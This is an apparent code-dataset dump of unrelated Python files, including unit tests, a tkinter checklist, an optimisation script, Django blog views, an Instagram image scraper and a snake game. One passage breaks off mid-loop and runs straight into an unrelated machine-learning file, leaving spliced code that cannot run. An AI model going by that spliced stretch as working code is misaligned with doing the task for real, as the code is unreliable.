main(ii)","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"203163225","text":"import pangram\r\nimport unittest\r\n\r\n\r\nclass TestPG(unittest.TestCase):\r\n\r\n def test_quick_brown_fox_jumped_over_the_fence_as_TRUE(self):\r\n pc = pangram.Checker()\r\n sentence = \"A quick brown fox jumps over the lazy dog.\"\r\n self.assertEqual(True, pc.test(sentence))\r\n\r\n def test_quick_brown_fox_jumped_over_the_fence_as_FALSE(self):\r\n pc = pangram.Checker()\r\n sentence = \"A quick brown fox jumps over the dog.\"\r\n self.assertEqual(False, pc.test(sentence))\r\n\r\n def test_from_pangrams_list(self):\r\n #\r\n # from http://clagnut.com/blog/2380/\r\n #\r\n sentence = \"Sympathizing would fix Quaker objectives.\"\r\n pc = pangram.Checker()\r\n self.assertEqual(True, pc.test(sentence))\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","sub_path":"pangram/test_pangram.py","file_name":"test_pangram.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"578834371","text":"import element.node\n\nclass ActionView(object):\n def __init__(self, rendered, event_dispatcher):\n self.rendered = rendered\n self.event_dispatcher = event_dispatcher\n\n def dispatch(self, request_handler, *args, **kwargs):\n if '_controller' not in kwargs:\n return\n\n serviceId, method = kwargs['_controller'].split(\":\")\n\n del kwargs['_controller']\n\n parameters = request_handler.request.query_arguments.copy()\n parameters.update(kwargs)\n\n node = element.node.Node('action://%s' % serviceId, {\n 'type': 'action.node',\n 'serviceId': serviceId,\n 'method': method,\n 'kwargs': parameters,\n 'request': request_handler.request\n })\n\n event = self.event_dispatcher.dispatch('element.node.load.success', {\n 'node': node\n })\n\n return self.rendered.render(request_handler, event.get('node'))\n","sub_path":"element/plugins/action/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"640177721","text":"import tkinter as tk\r\nfrom tkinter import *\r\nimport os\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Checklist\")\r\nitems = []\r\n\r\ncanvas = tk.Canvas(root, height=800, width=700, bg=\"#C0C0C0\")\r\ncanvas.pack()\r\n\r\nframe = tk.Frame(root, bg=\"white\")\r\nframe.place(relwidth=0.8, relheight = 0.8, relx=0.1, rely=0.1)\r\n\r\n\r\nif os.path.isfile('list.txt'):\r\n with open('list.txt', 'r') as f :\r\n temp = f.read()\r\n print(temp)\r\n temp = temp.split(\",\")\r\n items = [x for x in temp if x.strip()]\r\n for i in range (0,len(items)):\r\n label = tk.Label(frame, text=items[i], bg=\"#C0C0C0\")\r\n label.pack()\r\n\r\ndef getEntry():\r\n item = e.get()\r\n item = str(item)\r\n if item in items:\r\n global temporaryItem\r\n temporaryItem = item\r\n items.remove(item)\r\n else:\r\n items.append(item)\r\n print (items)\r\n for widget in frame.winfo_children():\r\n widget.destroy()\r\n for i in range (0,len(items)):\r\n label = tk.Label(frame, text=items[i], bg=\"#C0C0C0\")\r\n label.pack()\r\n\r\ndef undoTask():\r\n items.append(temporaryItem)\r\n for widget in frame.winfo_children():\r\n widget.destroy()\r\n for i in range (0,len(items)):\r\n label = tk.Label(frame, text=items[i], bg=\"#C0C0C0\")\r\n label.pack()\r\n\r\ne = tk.Entry(root, width=50)\r\ne.pack()\r\n\r\nadd = tk.Button(root, text=\"Click\", padx=10, pady=5, fg=\"white\", bg=\"#C0C0C0\", font=('helvetica',9), command=getEntry)\r\nadd.pack()\r\n\r\nundo = tk.Button(root, text=\"Undo\", padx=10, pady=5, fg=\"white\", bg=\"#C0C0C0\", command=undoTask)\r\nundo.pack()\r\n\r\nroot.mainloop()\r\n\r\nwith open('list.txt', 'w') as f:\r\n for item in items:\r\n f.write(item + ',')","sub_path":"List Keeper.py","file_name":"List Keeper.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"308555600","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport codecs\nimport icu\n\nfrom cldr_util import makePhonemeSet, match, check, regtest\n\nGRAPHEMES = icu.UnicodeSet()\nGRAPHEMES.applyPattern('[[:Taml:] [:P:]]')\n\nPHONEMES = makePhonemeSet(\"\"\"\n\n m n ɲ ɳ ŋ\n p b tʳ t̪ d̪ ʈ ɖ k ɡ\n f s ʂ sʼ ʃ h x\n ʋ r ɻ l ɭ j\n\n t͡ʃ d͡ʒ\n\n i iː u uː\n e eː o oː\n a aː\n\n aɪ̯ aʊ̯\n\n\n\"\"\")\n\ncheck('ta-fonipa-t-ta', GRAPHEMES, PHONEMES)\nregtest('ta-fonipa-t-ta', GRAPHEMES, PHONEMES)\n","sub_path":"cldr/check_translit_ta.py","file_name":"check_translit_ta.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"179986937","text":"source=input().split(\"=\")\nleft=list(source[0])\nright=list(source[1])\nlefts=[]\nrights=[]\nleft_a=0\nleft_start=0\nright_a=0\nrigth_start=0\nwhile(left_a= 3):\n predict_y.append(x[index]['vol_number'])\n word_index.append(index)\n elif (penult(w) == True):\n if (x[i]['vol_number'] >= 3):\n predict_y.append(x[index]['vol_number'] - 1)\n word_index.append(index)\n\n elif (antepenultimate(w) == True):\n if (x[i]['vol_number'] >= 3):\n predict_y.append(x[index]['vol_number'] - 2)\n word_index.append(index)\n elif (firstSyll(w) == True):\n predict_y.append(1)\n word_index.append(index)\n\n index += 1\n\n return predict_y, word_index\n\ndef cv_loop(model, name):\n data = preprocess.readplz()\n x, y=preprocess.get(data)\n SPLITS = 100\n kf = KFold(n_splits=SPLITS)\n all_score = 0\n\n avg_train_f1score=0\n avg_test_f1score=0\n\n for train,test in kf.split(x):\n x_train,x_test,y_train,y_test = x[train],x[test],y[train],y[test]\n\n model.fit(x_train,y_train)\n predict_y = model.predict(x_test) # 模型预测的结果 类型是numpy.ndarray\n\n data_test = data[test[0]:test[-1]+1] # 用于规则预测的测试集数据\n word_list = depart(data_test) # 测试集单词\n\n mid = list(map(extract_changed.extract_train, data[test[0]:test[-1]+1]))\n feature, true_y = vectorizer.departit(mid)\n t_predict_y, word_index = predict(feature, word_list)\n # 用规则判断结果去替换部分模型测试的结果\n i = 0\n for index in word_index:\n predict_y[index] = t_predict_y[i]\n i += 1\n\n\n # 计算分数\n t_score = f1_score(y_test,predict_y, average='weighted')\n avg_test_f1score += t_score\n\n\n print(name)\n print(avg_test_f1score/SPLITS)\n\nif __name__ == '__main__':\n\n models = [RandomForestClassifier(), ExtraTreesClassifier(), KNeighborsClassifier(),\n DecisionTreeClassifier(), LogisticRegression(), SVC()]\n model_names = ['RandomForestClassifier()', 'ExtraTreesClassifier()', 'KNeighborsClassifier()',\n 'DecisionTreeClassifier()', 'LogisticRegression()', 'SVC()']\n\n for i in range(len(models)):\n cv_loop(models[i], model_names[i])\n\n\n","sub_path":"2017年大数据处理与挖掘(暑期课程)/code/pkg/cv_ex_rule.py","file_name":"cv_ex_rule.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"387373692","text":"\nimport wolfpack\nfrom wolfpack import console\nfrom wolfpack.consts import *\n\n#\n# Add multiple instances of items based on tags\n# defined for the item on creation.\n#\ndef onAttach(object):\n\tif not object.isitem():\n\t\treturn\n\n\tif not object.hastag('itemdef'):\n\t\tconsole.log(LOG_ERROR, \"Missing itemdef tag for multibag object.\\n\")\n\t\treturn\n\n\tif not object.hastag('itemamount'):\n\t\tconsole.log(LOG_ERROR, \"Missing itemamount tag for multibag object.\\n\")\n\t\treturn\n\n\tid = str(object.gettag('itemdef'))\n\tamount = int(object.gettag('itemamount'))\n\n\tfor i in range(0, amount):\n\t\titem = wolfpack.additem(id)\n\t\titem.container = object\n\n\tobject.deltag('itemdef')\n\tobject.deltag('itemamount')\n\tobject.removescript('testing.multibag')\n","sub_path":"tags/Release_12_9_9/server/release/scripts/testing/multibag.py","file_name":"multibag.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"270483390","text":"# Copyright (C) 2020 Intel Corporation\n#\n# SPDX-License-Identifier: MIT\n\nfrom collections import OrderedDict, defaultdict\nfrom typing import Iterable, Union, Dict, List\n\nfrom datumaro.components.extractor import (Extractor, LabelCategories,\n AnnotationType, DatasetItem, DEFAULT_SUBSET_NAME)\nfrom datumaro.components.dataset_filter import \\\n XPathDatasetFilter, XPathAnnotationsFilter\n\n\nclass Dataset(Extractor):\n class Subset(Extractor):\n def __init__(self, parent):\n self.parent = parent\n self.items = OrderedDict()\n\n def __iter__(self):\n yield from self.items.values()\n\n def __len__(self):\n return len(self.items)\n\n def categories(self):\n return self.parent.categories()\n\n @classmethod\n def from_iterable(cls, iterable: Iterable[DatasetItem],\n categories: Union[Dict, List[str]] = None):\n if isinstance(categories, list):\n categories = { AnnotationType.label:\n LabelCategories.from_iterable(categories)\n }\n\n if not categories:\n categories = {}\n\n class _extractor(Extractor):\n def __iter__(self):\n return iter(iterable)\n\n def categories(self):\n return categories\n\n return cls.from_extractors(_extractor())\n\n @classmethod\n def from_extractors(cls, *sources):\n categories = cls._merge_categories(s.categories() for s in sources)\n dataset = Dataset(categories=categories)\n\n # merge items\n subsets = defaultdict(lambda: cls.Subset(dataset))\n for source in sources:\n for item in source:\n existing_item = subsets[item.subset].items.get(item.id)\n if existing_item is not None:\n path = existing_item.path\n if item.path != path:\n path = None\n item = cls._merge_items(existing_item, item, path=path)\n\n subsets[item.subset].items[item.id] = item\n\n dataset._subsets = dict(subsets)\n return dataset\n\n def __init__(self, categories=None):\n super().__init__()\n\n self._subsets = {}\n\n if not categories:\n categories = {}\n self._categories = categories\n\n def __iter__(self):\n for subset in self._subsets.values():\n for item in subset:\n yield item\n\n def __len__(self):\n if self._length is None:\n self._length = sum(len(s) for s in self._subsets.values())\n return self._length\n\n def get_subset(self, name):\n return self._subsets[name]\n\n def subsets(self):\n return self._subsets\n\n def categories(self):\n return self._categories\n\n def get(self, item_id, subset=None, path=None):\n if path:\n raise KeyError(\"Requested dataset item path is not found\")\n item_id = str(item_id)\n subset = subset or DEFAULT_SUBSET_NAME\n subset = self._subsets[subset]\n return subset.items[item_id]\n\n def put(self, item, item_id=None, subset=None, path=None):\n if path:\n raise KeyError(\"Requested dataset item path is not found\")\n\n if item_id is None:\n item_id = item.id\n if subset is None:\n subset = item.subset\n\n item = item.wrap(id=item_id, subset=subset, path=None)\n if subset not in self._subsets:\n self._subsets[subset] = self.Subset(self)\n self._subsets[subset].items[item_id] = item\n self._length = None\n\n return item\n\n def filter(self, expr, filter_annotations=False, remove_empty=False):\n if filter_annotations:\n return self.transform(XPathAnnotationsFilter, expr, remove_empty)\n else:\n return self.transform(XPathDatasetFilter, expr)\n\n def update(self, items):\n for item in items:\n self.put(item)\n return self\n\n def define_categories(self, categories):\n assert not self._categories\n self._categories = categories\n\n @staticmethod\n def _lazy_image(item):\n # NOTE: avoid https://docs.python.org/3/faq/programming.html#why-do-lambdas-defined-in-a-loop-with-different-values-all-return-the-same-result\n return lambda: item.image\n\n @classmethod\n def _merge_items(cls, existing_item, current_item, path=None):\n return existing_item.wrap(path=path,\n image=cls._merge_images(existing_item, current_item),\n annotations=cls._merge_anno(\n existing_item.annotations, current_item.annotations))\n\n @staticmethod\n def _merge_images(existing_item, current_item):\n image = None\n if existing_item.has_image and current_item.has_image:\n if existing_item.image.has_data:\n image = existing_item.image\n else:\n image = current_item.image\n\n if existing_item.image.path != current_item.image.path:\n if not existing_item.image.path:\n image._path = current_item.image.path\n\n if all([existing_item.image._size, current_item.image._size]):\n assert existing_item.image._size == current_item.image._size, \"Image info differs for item '%s'\" % existing_item.id\n elif existing_item.image._size:\n image._size = existing_item.image._size\n else:\n image._size = current_item.image._size\n elif existing_item.has_image:\n image = existing_item.image\n else:\n image = current_item.image\n\n return image\n\n @staticmethod\n def _merge_anno(a, b):\n # TODO: implement properly with merging and annotations remapping\n from .operations import merge_annotations_equal\n return merge_annotations_equal(a, b)\n\n @staticmethod\n def _merge_categories(sources):\n # TODO: implement properly with merging and annotations remapping\n from .operations import merge_categories\n return merge_categories(sources)","sub_path":"datumaro/components/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"21434838","text":"class Router:\n\n def __init__(self, context):\n self.handlers = list()\n self.context = context\n\n def handle(self, func, message=\"\", callback=\"\", command=\"\", step=\"\"):\n handler = Handler(func, message=message, callback=callback, command=command, step=step)\n self.handlers.append(handler)\n\n def use_middleware(self, middleware):\n if isinstance(middleware, list):\n for mdw in middleware:\n mdw(self.context)\n return\n\n middleware(self.context)\n\n def route(self, context):\n telegram_data = context.get(\"telegram\")\n user = context.get('user')\n\n print(\"+++++++++++++++++++++++++++++++++++++++++++\")\n print(\"Message:\", telegram_data.message)\n print(\"Callback:\", telegram_data.callback)\n\n for handler in self.handlers:\n # if handler if message type\n if handler.event_type == 1:\n if handler.step != \"\" and (handler.step == user.step):\n print(\"handler.step != '' and (handler.step == user.step)\")\n handler.handler(context)\n return\n\n if telegram_data.message == \"\": continue\n if handler.message == telegram_data.message:\n print(\"handler.message == telegram_data.message\")\n handler.handler(context)\n return\n\n # if handler is callback type\n if handler.event_type == 2:\n if handler.callback == telegram_data.callback:\n print(\"handler.callback == telegram_data.callback\")\n handler.handler(context)\n return\n\n # if handler is command type\n if handler.event_type == 3:\n if handler.command in telegram_data.message:\n print(\"handler.message in telegram_data.message\")\n print(\"Handler message:\", handler.message)\n print(\"Telegram message:\", telegram_data.message)\n\n print(handler.message in telegram_data.message)\n handler.handler(context)\n return\n\n\nclass Handler:\n def __init__(self, handler, message=\"\", callback=\"\", command=\"\", step=\"\"):\n if message or step:\n self.event_type = 1\n elif callback:\n self.event_type = 2\n elif command:\n self.event_type = 3\n\n self.handler = handler\n self.message = message\n self.callback = callback\n self.step = step\n self.command = command\n","sub_path":"router/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"555297320","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 17 16:49:54 2018\n\n@author: thieunv\n\"\"\"\n\n#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 17 01:36:18 2018\n\n@author: thieunv\n\n- Version 2: Copy code trong cuon: Clever Algorithms \n- Cai thien phan create_neigh_bee cho version 1.\n- Ket qua tot hon nhieu. Hoi tu nhanh hon\n\n300 epoch --> ver1: 0.8\n300 epoch --> ver2: 0.008\n\n\"\"\"\n\nfrom random import random, uniform, randint\nfrom copy import deepcopy\nfrom operator import itemgetter, add\n\n\ndef random_vector(minmax): # minmax: [ [-1, 1], [-1, 1], ... ]\n x = []\n for i in range(len(minmax)):\n x.append((minmax[i][1] - minmax[i][0]) * random() + minmax[i][0])\n return x\n\n\ndef create_random_bee(search_space):\n return random_vector(search_space)\n\n\ndef objective_function(vector):\n return reduce(add, (pow(x, 2.0) for x in vector), 0.0)\n\n\ndef create_neigh_bee_2(pop, individual, patch_size, search_space):\n t1 = randint(0, len(individual)-1)\n t2 = randint(0, len(pop)-1)\n \n bee = deepcopy(individual)\n bee[t1] = individual[t1] + uniform(-1, 1) * (individual[t1] - pop[t2][0][t1])\n \n if bee[t1] < search_space[i][0]:\n bee[t1] = search_space[i][0]\n if bee[t1] > search_space[i][1]:\n bee[t1] = search_space[i][1]\n return bee\n\n\ndef create_neigh_bee(pop, individual, patch_size, search_space):\n t1 = randint(0, len(individual)-1)\n \n bee = deepcopy(individual)\n if random() < 0.5:\n bee[t1] = individual[t1] + random() * patch_size\n else:\n bee[t1] = individual[t1] - random() * patch_size\n \n if bee[t1] < search_space[t1][0]:\n bee[t1] = search_space[t1][0]\n if bee[t1] > search_space[t1][1]:\n bee[t1] = search_space[t1][1]\n return bee\n\n\n\ndef search_neigh(pop, parent, neigh_size, patch_size, search_space): # parent: [ vector_individual, fitness ]\n \"\"\"\n Tim kiem trong so neigh_size, chi lay 1 hang xom tot nhat\n \"\"\"\n neigh = [create_neigh_bee(pop, parent[0], patch_size, search_space) for x in range(0, neigh_size)]\n neigh = [(bee, objective_function(bee)) for bee in neigh]\n neigh_sorted = sorted(neigh, key=itemgetter(1))\n return neigh_sorted[0]\n\n\ndef create_scout_bees(search_space, num_scouts): # So luong ong trinh tham\n return [create_random_bee(search_space) for x in range(0, num_scouts)]\n\n\ndef search(max_gens, search_space, num_bees, num_sites, elite_sites, patch_size, e_bees, o_bees):\n pop = [create_random_bee(search_space) for x in range(0, num_bees)]\n for j in range(0, max_gens):\n pop = [(bee, objective_function(bee)) for bee in pop]\n pop_sorted = sorted(pop, key=itemgetter(1))\n best = pop_sorted[0]\n\n next_gen = []\n for i in range(0, num_sites):\n if i < elite_sites:\n neigh_size = e_bees\n else:\n neigh_size = o_bees\n next_gen.append(search_neigh(pop_sorted, pop_sorted[i], neigh_size, patch_size, search_space))\n\n scouts = create_scout_bees(search_space, (num_bees - num_sites)) # Ong trinh tham\n pop = [x[0] for x in next_gen] + scouts\n patch_size = patch_size * 0.99\n print(\"Epoch = {0}, patch_size = {1}, best = {2}\".format(j + 1, patch_size, best[1]))\n return best\n\n\n\nif __name__ == \"__main__\":\n # num_hidden_unit = 8\n # num_output = 3\n # problem_size = num_hidden_unit * num_output + num_output # weights hidden and bias output\n problem_size = 24\n search_space = [[-1, 1] for i in range(problem_size)]\n\n max_gens = 280 # epoch\n num_bees = 100 # number of bees - population\n num_sites = 3 # phan vung, 3 dia diem \n elite_sites = 1\n patch_size = 3.0\n e_bees = 10\n o_bees = 3\n\n best = search(max_gens, search_space, num_bees, num_sites, elite_sites, patch_size, e_bees, o_bees)\n print(\"done! Solution: f = {0}, s = {1}\".format(best[1], best[0]))\n","sub_path":"do_an/old_result_my_neural/estimators/artificial_bee_colony_2.py","file_name":"artificial_bee_colony_2.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"89777349","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.core.context_processors import csrf\nfrom django.shortcuts import render_to_response, redirect\nfrom testblog.models import Comments, Posts\nfrom django.contrib import auth\nfrom django.contrib.auth.models import User \nfrom testblog.forms import UserLoginForm, RegisterForm, PostForm, CommentForm, ChangeProfile\nfrom django.views.generic.simple import direct_to_template\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.forms import forms\nfrom django.template import loader, Context \nfrom django.forms.models import inlineformset_factory\nfrom django.contrib.auth.views import login, logout\n\ndef main(request):\n if not request.user.is_authenticated():\n return HttpResponseRedirect('/')\n post = Posts.objects.all().order_by('-date_post')\n comment = Comments.objects.all()\n return render_to_response('main.html', locals()) \n\ndef myposts(request, id):\n post = Posts.objects.all()\n return render_to_response('myposts.html', locals())\n\ndef profile(request):\n if not request.user.is_authenticated():\n return HttpResponseRedirect('/')\n #user = User.objects.all()\n #post = Posts.objects.filter(user_id = id)\n return render_to_response('profile.html', locals())\n\ndef view_post(request, id):\n if not request.user.is_authenticated():\n return HttpResponseRedirect('/')\n post1 = Posts.objects.get(id = id)\n comment = Comments.objects.filter(post_id = id).order_by('-date_com')\n form = CommentForm()\n if request.method == 'POST':\n user = request.user\n u = Comments(user_id=user, post_id = post1)\n form = CommentForm(request.POST, instance=u)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(\"/main\")\n return render_to_response('post1.html', locals())\n \ndef login(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = auth.authenticate(username=username, password=password)\n if user is not None and user.is_active:\n auth.login(request, user)\n return HttpResponseRedirect(\"/profile\")\n else:\n return HttpResponseRedirect(\"/\")\n return render_to_response('login.html', locals())\n\ndef logout(request):\n auth.logout(request)\n return HttpResponseRedirect(\"/\")\n\ndef register(request):\n form = RegisterForm()\n if request.method == 'POST':\n data = request.POST.copy()\n form = RegisterForm(request.POST)\n if form.is_valid():\n form.save(data) \n return HttpResponseRedirect(\"/\")\n else:\n form = RegisterForm()\n return render_to_response(\"registration/register.html\", locals())\n\ndef addpost(request):\n if not request.user.is_authenticated():\n return HttpResponseRedirect('/')\n form = PostForm()\n if request.method == 'POST': \n user = request.user\n post = Posts(user_id=user)\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n form.save() \n return HttpResponseRedirect('/profile/%s/myposts' % request.user.id)\n else:\n form = PostForm()\n return render_to_response(\"postadd.html\", locals())\n\ndef changeprofile(request):\n if not request.user.is_authenticated():\n return HttpResponseRedirect('/')\n form = ChangeProfile()\n if request.method == 'POST':\n first_name = request.POST['first_name']\n last_name = request.POST['last_name']\n email = request.POST['email']\n change = User.objects.filter(id = request.user.id).update(first_name=first_name, last_name=last_name, email=email)\n return HttpResponseRedirect('/profile')\n return render_to_response(\"changeprofile.html\", locals())\n","sub_path":"TestBlog/testblog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"599473550","text":"import argparse\nimport csv\nimport os\n\nimport requests\nfrom requests_html import HTMLSession\n\nsession = HTMLSession()\n\n\ndef scrape(tags, total_count):\n for tag in tags:\n try:\n os.mkdir(tag)\n except FileExistsError:\n pass\n\n url = 'https://www.instagram.com/explore/tags/' + tag\n req = session.get(url)\n\n count = 0\n page = 0\n with open(os.path.join(tag, 'data.csv'), 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',',\n quotechar='|', quoting=csv.QUOTE_MINIMAL)\n\n while count <= total_count:\n req.html.render(scrolldown=page)\n images = req.html.xpath('//img[@alt]')\n page += 1\n for image in images:\n try:\n url, caption = image.attrs['src'], image.attrs['alt'].replace('\\n', '\\\\n')\n\n with open(os.path.join(tag, str(count) + '.jpg'), 'wb') as img:\n img.write(requests.get(url).content)\n\n writer.writerow([count, caption])\n print('[{}]'.format(tag), 'downloaded image ' + str(count), url)\n count += 1\n if count >= total_count:\n break\n except:\n print('!!one image failed!!')\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--tags', '-t', nargs='+',\n help='Tags to scrape images from')\n parser.add_argument('--count', '-c', type=int,\n help='Total number of images to scrape for each given '\n 'tag.')\n args = parser.parse_args()\n assert args.tags, \"Enter tags to scrape! Use --tags option, see help.\"\n assert args.count, \"Enter total number of images to scrape using --count option, see help.\"\n scrape(args.tags, args.count)\n","sub_path":"instagram_scrapper.py","file_name":"instagram_scrapper.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"343693477","text":"from rest_framework import status\nfrom rest_framework.authtoken.models import Token\nfrom django.urls import reverse\nfrom django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponseRedirect\nfrom rest_framework.response import Response\nfrom django.contrib.auth.decorators import login_required\nfrom rest_framework.decorators import api_view\nfrom quickstart.models import UserDetails,UserGroup\nfrom quickstart.API.serializer import *\nfrom rest_framework.authentication import TokenAuthentication\nfrom django.contrib.auth import login as django_login, logout as django_logout\n\n@api_view(['GET'])\ndef get_user_details(self,request):\n return Response(request)\n\n\n\n@login_required(login_url=\"/login\")\n@api_view(['POST'])\ndef addgroup(request):\n context = {}\n context['user'] = 'manish'\n return Response(context['user'])\n\n@login_required(login_url=\"/login/\")\n@api_view(['POST'])\ndef logout_user(request):\n logout(request)\n return Response('Logout Successfully')\n\n\n@api_view(['POST'])\ndef add_user_details(request):\n data=request.data\n #return Response(data)\n serializer = RegisterSerializer(data=data)\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data[\"user\"]\n token, created = Token.objects.get_or_create(user=user)\n return Response({\"token\": token.key}, status=200)\n\n\n@api_view(['POST'])\ndef login_user(request):\n data=request.data\n #return Response(data)\n serializer = LoginSerializer(data=data)\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data[\"user\"]\n django_login(request, user)\n token, created = Token.objects.get_or_create(user=user)\n return Response({\"token\": token.key}, status=200)\n \n","sub_path":"quickstart/API/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"605401319","text":"# Slithering.py\r\n\r\nimport pygame\r\nimport sys\r\nimport time\r\nimport random\r\n\r\npygame.init()\r\n\r\n# Constants\r\nblack = (0, 0, 0)\r\nwhite = (255, 255, 255)\r\nred = (255, 0, 0)\r\nwindow_width = 800\r\nwindow_height = 600\r\n\r\n# setup environment\r\ngameDisplay = pygame.display.set_mode((window_width, window_height))\r\npygame.display.set_caption(\"Snekkz\")\r\nfont = pygame.font.SysFont(None, 25, 1)\r\n\r\n\r\ndef myquit():\r\n pygame.quit()\r\n sys.exit(0)\r\n\r\n\r\nclock = pygame.time.Clock()\r\nFPS = 5\r\nblockSize = 20\r\nnoPixel = 0\r\n\r\n\r\ndef snake(blockSize, snakeList):\r\n for size in snakeList:\r\n pygame.draw.rect(gameDisplay, black, [\r\n size[0]+5, size[1], blockSize, blockSize], 2)\r\n\r\n\r\ndef message(msg, color):\r\n screen_text = font.render(msg, True, color)\r\n gameDisplay.blit(screen_text, [window_width/2, window_height/2])\r\n\r\n\r\ndef gameloop():\r\n gameExit = False\r\n gameOver = False\r\n lead_x = window_width/2\r\n lead_y = window_height/2\r\n del_x = 0\r\n del_y = 0\r\n snakeList = []\r\n snakeLength = 1\r\n\r\n randomAppleX = round(random.randrange(0, window_width-blockSize)/10.0)*10.0\r\n randomAppleY = round(random.randrange(\r\n 0, window_height-blockSize)/10.0)*10.0\r\n\r\n# Game Loop\r\n\r\n while not gameExit:\r\n\r\n # If the game is over\r\n while gameOver:\r\n gameDisplay.fill(white)\r\n message(\"Press return key to start or Esc to quit\", red)\r\n pygame.display.update()\r\n\r\n for event in pygame.event.get():\r\n if(event.type == pygame.QUIT):\r\n gameOver = False\r\n gameExit = True\r\n # Check for keypress\r\n if(event.type == pygame.KEYDOWN):\r\n if (event.key == pygame.K_q):\r\n gameExit = True\r\n gameOver = False\r\n if(event.key == pygame.K_RETURN):\r\n gameloop()\r\n\r\n # Otherwise\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n gameExit = True\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n myquit()\r\n leftArrow = event.key == pygame.K_LEFT or event.key == pygame.K_a\r\n rightArrow = event.key == pygame.K_RIGHT or event.key == pygame.K_d\r\n upArrow = event.key == pygame.K_UP or event.key == pygame.K_w\r\n downArrow = event.key == pygame.K_DOWN or event.key == pygame.K_s\r\n\r\n if leftArrow:\r\n del_x = -blockSize\r\n del_y = noPixel\r\n elif rightArrow:\r\n del_x = blockSize\r\n del_y = noPixel\r\n elif upArrow:\r\n del_x = noPixel\r\n del_y = -blockSize\r\n elif downArrow:\r\n del_x = noPixel\r\n del_y = blockSize\r\n\r\n if lead_x < 0 or lead_x >= window_width or lead_y < 0 or lead_y >= window_height:\r\n gameOver = True\r\n lead_x += del_x\r\n lead_y += del_y\r\n gameDisplay.fill(white)\r\n\r\n AppleThickness = 20\r\n print([int(randomAppleX), int(randomAppleY),\r\n AppleThickness, AppleThickness])\r\n pygame.draw.rect(gameDisplay, red, [\r\n randomAppleX, randomAppleY, AppleThickness, AppleThickness])\r\n\r\n allspritesList = []\r\n allspritesList.append(lead_x)\r\n allspritesList.append(lead_y)\r\n snakeList.append(allspritesList)\r\n\r\n if(len(snakeList) > snakeLength):\r\n del snakeList[0]\r\n for eachSegment in snakeList[:-1]:\r\n if(eachSegment == allspritesList):\r\n gameOver = True\r\n snake(blockSize, snakeList)\r\n pygame.display.update()\r\n\r\n if(lead_x >= randomAppleX and lead_x <= randomAppleX+AppleThickness):\r\n if(lead_y >= randomAppleY and lead_y <= randomAppleY+AppleThickness):\r\n randomAppleX = round(random.randrange(\r\n 0, window_width-blockSize)/10.0)*10.0\r\n randomAppleY = round(random.randrange(\r\n 0, window_height-blockSize)/10.0)*10.0\r\n snakeLength += 1\r\n \r\n clock.tick(FPS)\r\n pygame.quit()\r\n quit()\r\ngameloop()\r\n","sub_path":"Slithering.py","file_name":"Slithering.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"114714942","text":"# 16.3 Intersection\n\"\"\"\nGiven two straight line segments (represented as a start point and an end point), compute the pint of intersection, if any.\n\"\"\"\nimport random\n\ndef mxpb(line):\n horizontal = False\n vertical = False\n x1 = line[0][0]\n y1 = line[0][1]\n x2 = line[1][0]\n y2 = line[1][1]\n if y1 is y2:\n return False, \"hor\"\n elif x1 is x2:\n return False, \"ver\"\n else:\n slope = (y1 - y2)/(x1 - x2)\n b = y1 - x1*slope\n return b, slope\n\ndef intersect(lineA, lineB):\n Ax1 = lineA[0][0]\n Ay1 = lineA[0][1]\n Ax2 = lineA[1][0]\n Ay2 = lineA[1][1]\n Bx1 = lineB[0][0]\n By1 = 